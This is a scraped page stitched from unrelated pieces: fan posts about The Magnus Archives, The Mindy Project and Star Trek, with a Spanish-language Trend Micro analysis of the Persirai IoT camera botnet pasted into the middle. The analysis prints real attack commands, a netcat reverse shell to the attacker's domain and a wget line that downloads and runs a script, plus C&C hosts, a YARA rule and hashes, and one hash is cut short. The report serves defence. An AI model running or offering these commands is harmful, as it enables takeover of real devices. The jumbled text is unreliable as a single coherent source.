Here’s a silly little drawing from some months ago

Denise focusing on herself…I love to see it.

She needs to love herself first before getting in a relationship.

they really did just put the gay men in the computer huh

goddddd jon and georgie make me so SAD like part of her is convinced protocol archivist is jon and she's still just like 'we need to find and kill it immediately' oughhhhhh 😭

TREVOR IS A MINISTER????

personal magnus protocol fandom feelings

I missed really getting to interact with TMA fandom because by the time I got caught up (between s4 and s5), it got hit bad with the antis/fan wank and a lot of the people who I would've vibed with retreated to more private fan spaces TMP feels like a second chance in a way but I still don't know how how to find more of the cool fun people/spaces. Twitter keeps giving me minors and "proship dni" in bio and I know there's gotta be more than 3 people who aren't that and also aren't explicit art accounts (im fine with nsfw/dead dove content, just not in my main twitter feed. I like a little more choice in engaging than Twitter gives me and also I live with other people who I don't want to see dicks over my shoulder)

and idek where to start with discords. I don't trust any publically linked servers to not be a mess but I don't know people to get invites to ones more my type

fandom as a series of walled gardens is great but someone give me a map or guidebook please I wanna break out of my containment cell

this is probably a weird question to suddenly receive, but you're like the only person i know who'd get it so- how In Your Face is the Jon/Martin relationship in TMA?

i haven't finished s1 yet, but the idea of their relationship being a central focus makes me want to drop the entire thing, which really sucks because so far, it's the only podcast that's scratching that Itch

I am absolutely the right person to ask, anon!

So for me personally, I actually thought it was pretty bearable for the majority of the show. There's very little in the early show, thankfully, and for the rest of it, it's just some annoying pining from Martin. It can get frustrating at times, but for seasons 1-4, it's very much one-sided with only very very vague implications that Jon may have feelings for Martin in s4 (if I recall correctly). If you're aro (like me) or you just really hate their relationship and/or Martin personally (also like me), it's all really easy to ignore. I can remember that the fandom is actually what made it so difficult and frustrating for me personally.

S5 is when their relationship is actually made canon and it's commonly referred to by the fandom as an "apocalyptic honeymoon roadtrip" so. . . if you're not into them as a ship, you can do what the rest of us did and pretend like the s4 was the final season lmao

It's a really good show (though I have heard TERRIBLE things about TMP) and I highly recommend most of it, but yeah. Maybe give s5 a pass if you don't want to deal with the Jmart Show™, otherwise have fun.

i just don’t see how jody and mindy weren’t endgame, it was clearly hinted that something would happen between them considering how they build up to jody having feelings for her, how the show hinted that they would be a good couple (aka during the viewing of the office’s favorite show, but also by some characters aswell) but also being supportive of her like no one else. and i have to talk about that speech he gave in the season 4 finale when he said that she’s always taking care of others and it was time someone took care of her for a change, and not only that but he brought the apartment upstairs so leo could have his own room!! and comparing the last scenes she has with both danny and jody in this episode, danny turns away realising that he cheated on his fiancée which despite the whole lovey-dovey thing going on between him and mindy, you can tell he hasn’t really changed while jody gives her this beautiful speech and buy an apartment for her son

Oh, what a sweet and lovely image of Martin having a collection of tape recorders in his office that he treasures and gives nice little pats when he walks past them.

Even after he knows that they're not good for him, or at the very least, operating on an agenda that's vaguely Bad For Everything, he can't help but find them charming anyways. They're so neat! And besides, it's not their fault that some evil entity decided to use them to capture fear and bottle it up as a little menacing snack, now is it? The tapes just like the rest of the them: caught up in something much bigger than any one person, and just a smidge too big to really be comprehensible.

Idk. I could cite my sources (parts of s4, or ep 170, for instance: ooh boy!), but really, it all boils down to Martin being sympathetic towards the recorders and yes, perhaps a little vindictive towards people he doesn't like. That's what makes him fun! And now I'm just picturing him siccing tape recorders on people. I don't think "bite that person" is very far from "obliterate that man I'm jealous of" :)

Not that I really think this particular tape recorder is working for Martin K. Blackwood within TMP canon: simply something I might absorb into my TMA headcannons... I certainly will be folding it up and filing it into "For Future Consideration," wherein I will hopefully be able to emerge with a clear, solid concept I can run wild with.

Yknow Martin's fondness for the recorders in TMA? And this really really funny bit in TMAGP 21:

Well.

Ink5oul: GET YO FUCKIN DOG BITCH

Martin: It don't bite :)

Ink5oul: YES IT DO-

Okay, okay. Star Trek Day News:

Star Trek: Lower Decks - S2 currently on (new episode tomorrow!!)

Star Trek: Prodigy - S1 October 28th

Star Trek: Discovery - S4 November 18th

Star Trek: Picard - S2 February 2022 (no specific day yet) + S3 confirmation (being filmed right now)

Star Trek: Strange New Worlds - Cast and characters announcement, but no date set

No mention of Section 31 or the new movie (the remaster of TMP had a thing released for it though). There was more talk about a Star Trek: Starfleet Academy show. Last time things were being hinted at a lot was Strange New Worlds and that's happening, so... hm.

not a question, but i just wanted to say that i entered your profile and was immediately greeted with tma and bsd stuff. instant follow. you're the first account I've found with posts about BOTH of my favourite hyperfixations. thank you, your taste is immaculate.

ahsbsba tysm 😭 yeah bsd and tma are def my top fixations too!! so its safe to say i am very very excited for 2023 with bsd s4 and tmp :33

Rewatching, and season 5 and 6 of tmp are so terrible

"is that narnia i dont wanna go there its for nerds ! "

TMP 401 Rewatch

‘While I Was Sleeping’ is one of my favourite episodes and definitely my favourite from the newer seasons. I love Mindy’s parents and find that storylines with Morgan and Danny together are always funny because the characters play off each other so well(’Road Trip’ is my other favourite S4 episode). Also the proposal scene is perfect and i consider S4 Danny to be his peak in terms of attractiveness(superficial, i know). Most of all though, i love this episode because of that scene outside the restaurant in the rain where Mindy says “you’re the one i’m supposed to be with” to Danny. It is so heartbreaking and poignant, especially after watching the rest of S4 and S5 and seeing the dissolution of Dandy. 

On a sidenote though, it makes me laugh that Mindy calls Morgan in Texas in afternoon/night, then she goes to bed and when she wakes up Danny is waiting for her at home? So in the space of one night, Morgan and Danny fly to India and back(or at least Morgan does) and there is still enough time left for Danny to wake Mindy up in the morning? 

I love TMP and miss Danny on the show but i just want to defend CM's choice to do 'Sharp Objects'. Why should CM have to stay on if he wasn't happy? TMP was cancelled by FOX and he probably had a new contract with HULU. He didn't do anything wrong. IMO it's the show's execs who are to blame as they probably knew CM wanted out before the start of S4 and didn't make changes. I feel like they are still being dishonest about their plans and it wouldn't surprise me if CM isn't even a guest in S6.

Also, just to add something i forgot. ‘Sharp Objects’ is a limited series with only 8 eps so i doubt it significantly changes anything about CM’s availability or ability to be on TMP.

You have a point, and I don’t begrudge his involvement in Sharp Objects since it’s an opportunity. And TMP’s shoot is over. And I read somewhere that filming for SO has already started early this month? So that sounds like a good thing. Let’s hope for the best.    

But I guess thing is, new contract or not, there’s something to be said about the lack of commitment to (probably) a multi-year thing you signed up for, especially since, as another anon points out, you’re the leading man, on a rom-com no less. Your absence is not bound to sit well with some fans. 

On the other hand, I’d like to add that I think he left the show at an opportune time, like it’s sad but it works you know? The writers were able to take advantage of the situation. Now, if only a reunion would be possible. 

Persirai: la nueva red botnet de Internet de las Cosas (IoT) apunta a las cámaras IP

Se ha descubierto una nueva botnet* de Internet de Cosas (IoT) denominada Persirai (detectada por Trend Micro como ELF_PERSIRAI.A), que está dirigida a más de 1.000 modelos de cámaras IP (Internet Protocol) basadas en diversos productos de Fabricantes de Equipamiento Original (OEM). Este desarrollo viene pisando los talones a Mirai -un malware de puerta trasera de código abierto que causó algunos de los incidentes más notables de 2016 mediante ataques de denegación de servicio distribuidos (DDoS) que comprometieron a dispositivos de IoT como grabadoras de vídeo digital (DVR) y cámaras CCTV , así como a la botnet Hajime.

El equipo de Trend Micro ha detectado aproximadamente 120.000 cámaras IP que son vulnerables a ELF_PERSIRAI.A a través de Shodan. Muchos de estos usuarios vulnerables no saben que sus cámaras IP están expuestas a Internet.

Figura 1: Número de cámaras IP vulnerables a 26 de abril de 2017, (derivados de los datos de Shodan)

Esto hace que sea mucho más fácil para los autores que están detrás del malware obtener acceso a la interfaz web de la cámara IP a través del puerto TCP 81.

Comportamiento y Análisis

Figura 2: Flujo de infección de ELF.PERSIRAI.A

Las cámaras IP suelen utilizar protocolos Universal Plug and Play (UPnP), que son protocolos de red que permiten a los dispositivos abrir un puerto en el router y actuar como un servidor, haciéndolos objetivos altamente visibles para el malware de IoT.

Después de iniciar sesión en la interfaz vulnerable, el atacante puede realizar una inyección de comandos para forzar a la cámara IP a conectarse a un sitio de descarga mediante el siguiente comando:

·         $(nc load.gtpnet.ir 1234 -e /bin/sh)

El sitio de descarga responderá con los siguientes comandos:

·         busybox nohup sh -c “killall encoder ;wget http://ntp.gtpnet.ir/wificam.sh -O /tmp/a.sh ;chmod +x /tmp/a.sh ;/tmp/a.sh” > /dev/null 2>&1 &

Estos comandos descargarán y ejecutarán script shell maliciosos del dominio ntp.gtpnet.ir

La wificam.sh descargará y ejecutará los siguientes ejemplos, que se eliminarán después de la ejecución:

Una vez que las muestras se han descargado y ejecutado, el malware se elimina y solo se ejecutará en la memoria. También bloqueará el exploit zero-day apuntando a ftpupdate.sh y ftpupload.sh a /dev/null para evitar que otros atacantes apunten a la cámara IP de la víctima. Sin embargo, una vez que la cámara se reinicia, será de nuevo vulnerable al exploit.

La cámara IP afectada informará a los servidores C&C:

load.gtpnet.ir

ntp.gtpnet.ir

185.62.189.232

95.85.38.103

Después de recibir órdenes del servidor, la cámara IP comenzará a atacar automáticamente otras cámaras IP aprovechando una vulnerabilidad zero-day que se hizo pública hace unos meses. Los atacantes que explotan esta vulnerabilidad podrán obtener el archivo de contraseñas del usuario, proporcionándoles así los medios para realizar las inyecciones de comando, independientemente del grado de seguridad de la contraseña. A continuación se incluye un ejemplo de una muestra de la carga útil:

Figura 3: Ejemplo de carga útil de ELF.PERSIRAI.A

La cámara IP recibirá entonces un comando del servidor C&C, indicándole que realice un ataque DDoS en otros equipos a través de inundaciones User Datagram Protocol (UDP). Cabe destacar que Persirai puede realizar ataques DDoS con el protocolo UDP (User Datagram Protocol) con paquetes SSDP sin simular una dirección IP.

El protocolo de puerta trasera se puede ver a continuación:

Figura 4: Protocolo de puerta trasera del servidor C&C

Las partes rojas indican la comunicación desde el servidor C&C a la cámara IP de la víctima. Contiene los comandos de ataque y la dirección IP y el puerto de destino DDoS.

Figura 5: Caracteres especiales utilizados por Persirai

Los servidores C&C descubiertos por Trend Micro utilizaron el código de país .IR. Este código específico de país es administrado por un instituto de investigación de Irán que lo restringe sólo a los iraníes. También se han encontrado algunos caracteres especiales persas utilizados por el autor del malware.

El fabricante de la cámara IP utilizada en la muestra afirmó que el firmware más reciente solucionó la vulnerabilidad, por lo que intentamos actualizar el firmware de la cámara IP. Sin embargo, el firmware indica que ya está utilizando la última versión.

Figura 6: Firmware de la cámara IP

Conclusión y mitigación Aparte de ser el primer malware que puso en evidencia la seguridad de IoT, también observamos cómo la naturaleza de código abierto de Mirai le dio el potencial para actuar como la plantilla central sobre la que se construirá el futuro malware centrado en IoT.

A medida que Internet de las cosas gana tracción con los usuarios de a pie, los ciberdelincuentes pueden optar por alejarse de los servidores Network Time Protocol (NTP) and Domain Name System (DNS para ataques DDoS, concentrándose en dispositivos vulnerables -un problema compuesto por usuarios que practican laxas medidas de seguridad.

Un gran número de estos ataques fue provocado por el uso de la contraseña predeterminada en la interfaz del dispositivo. Por lo tanto, los usuarios deben cambiar su contraseña por defecto tan pronto como sea posible y usar una contraseña fuerte para sus dispositivos.

Sin embargo, como se ve en la presencia de la vulnerabilidad de robo de contraseña mencionada anteriormente, una contraseña fuerte por sí sola no garantiza la seguridad del dispositivo. Los propietarios de cámaras IP también deben implementar otros pasos para garantizar la protección de sus dispositivos de ataques externos. Además de utilizar una contraseña segura y fuerte, los usuarios también deben deshabilitar UPnP en sus routers para evitar que los dispositivos dentro de la red abran puertos a Internet externos sin ninguna advertencia.

La carga de la seguridad de IoT no depende únicamente del usuario, sino que también depende de los fabricantes, ya que deberían ser los responsables de garantizar que sus dispositivos son seguros y siempre están actualizados. En consecuencia, los usuarios deben asegurarse de que sus dispositivos siempre se actualizan con el último firmware para minimizar la posibilidad de que se exploten vulnerabilidades.

Las soluciones de Trend Micro

Junto a las buenas prácticas mencionadas anteriormente, existen otras soluciones a disposición de los usuarios como:  Trend Micro™ Security y Trend Micro Internet Security, que ofrecen una protección eficaz para las amenazas a dispositivos IoT mediante funciones de seguridad que pueden detectar malware a nivel del endpoint. Los dispositivos conectados protegidos por soluciones de seguridad como Trend Micro Home Network Security, pueden verificar el tráfico de Internet entre el router y todos los dispositivos conectados. Además, las empresas pueden monitorizar todos los puertos y protocolos de red para detectar amenazas avanzadas y protegerlos de ataques dirigidos a través de Trend Micro™ Deep Discovery™ Inspector .

Deep Discovery Inspector proteger a los usuarios de esta amenaza a través de estas reglas DDI:

DDI beta rule 3664: “IP Camera Remote Code Execution – HTTP (Request)”

DDI beta rule 3665: “IP Camera Authentication Bypass – HTTP (Request)”

Los usuarios con Trend Micro Home Network Security están protegidos a través de las siguientes firmas:

1133578 WEB GoAhead system.ini Information Disclosure Vulnerability -1 (CVE-2017-5674)

1133642 WEB GoAhead system.ini Information Disclosure Vulnerability -2 (CVE-2017-5674)

1133641 WEB Shell Spawning Attempt via telnetd -1.u

La regla Yara para la detección se ofrece a continuación:

rule Persirai { meta: description = “Detects Persirai Botnet Malware” author = “Tim Yeh” reference = “Internal Research” date = “2017-04-21” hash1 = “f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489” hash2 = “e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c” hash3 = “35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32” hash4 = “ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c” hash5 = “ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f”

strings: $x1 = “ftpupload.sh” fullword ascii $x2 = “/dev/misc/watchdog” fullword ascii $x3 = “/dev/watchdog” ascii $x4 = “:52869/picsdesc.xml” fullword ascii $x5 = “npxXoudifFeEgGaACScs” fullword ascii

$s1 = “ftptest.cgi” fullword ascii $s2 = “set_ftp.cgi” fullword ascii $s3 = “2580e538f3723927f1ea2fdb8d57b99e9cc37ced1” fullword ascii $s4 = “023ea8c671c0abf77241886465200cf81b1a2bf5e” fullword ascii

condition: uint16(0) == 0x457f and filesize < 300KB and ( ( 1 of ($x*) and 1 of ($s*) ) or 2 of ($s*) ) }

Hashes SHA256 relacionados detectados como ELF_PERSIRAI.A:

d00b79a0b47ae38b2d6fbbf994a2075bc70dc88142536f283e8447ed03917e45

f974695ae560c6f035e089271ee33a84bebeb940be510ab5066ee958932e310a

af4aa29d6e3fce9206b0d21b09b7bc40c3a2128bc5eb02ff239ed2f3549532bb

aa443f81cbba72e1692246b5647a9278040400a86afc8e171f54577dc9324f61

4a5ff1def77deb11ddecd10f96e4a1de69291f2f879cd83186c6b3fc20bb009a

44620a09441305f592fb65d606958611f90e85b62b7ef7149e613d794df3a778

a58769740a750a8b265df65a5b143a06972af2e7d82c5040d908e71474cbaf92

7d7aaa8c9a36324a2c5e9b0a3440344502f28b90776baa6b8dac7ac88a83aef0

4a5d00f91a5bb2b6b89ccdabc6c13eab97ede5848275513ded7dfd5803b1074b

264e5a7ce9ca7ce7a495ccb02e8f268290fcb1b3e1b05f87d3214b26b0ea9adc

ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c

ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f

f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489

e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c

35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c364797

*Botnet: es una red de robots informáticos o bots, que se ejecutan de manera autónoma y automática.1 El artífice de la botnet puede controlar todos los ordenadores/servidores infectados de forma remota.

*whispers* I put the gag reel on YouTube - idk how long it’ll stay up so enjoy, rip, download away :)

*still whispering* also on dropbox here https://www.dropbox.com/sh/fkgq3qdcdyzy5dk/AADZXlElnSZp9oV2pguIRa0va?dl=0